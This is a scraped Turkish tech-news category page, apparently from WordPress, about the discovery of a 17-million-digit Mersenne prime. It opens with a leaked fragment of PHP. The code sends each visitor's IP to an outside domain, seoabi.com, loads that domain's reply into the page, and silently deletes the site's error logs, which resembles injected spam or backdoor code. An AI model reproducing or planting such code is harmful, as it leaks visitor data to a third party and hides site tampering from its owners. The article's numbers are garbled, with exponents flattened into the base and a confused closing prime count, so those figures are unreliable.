$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> bulundu | Teknoloji Haberleri

bulundu kategorisindeki tüm yazılar

Son Yazılar

Dünyanın en özel sayısı bulundu

Dünyanın en büyük asal sayısı olan 17 milyon basamaklı Mersenne sayısı bulundu. “257,885,161-1” şeklinde yazılan 48’inci Mersenne sayısı, Missouri Üniversitesi’nden Dr. Cooper tarafından keşfedildi. Mersenne sayısı, “Mp = 2n-1” formunda yazılabilen ve oldukça nadir bulunan sayılar olarak geçiyor. 0 ile 225,964,951-1 arasında 1,622,441 adet asal sayı bulunuyor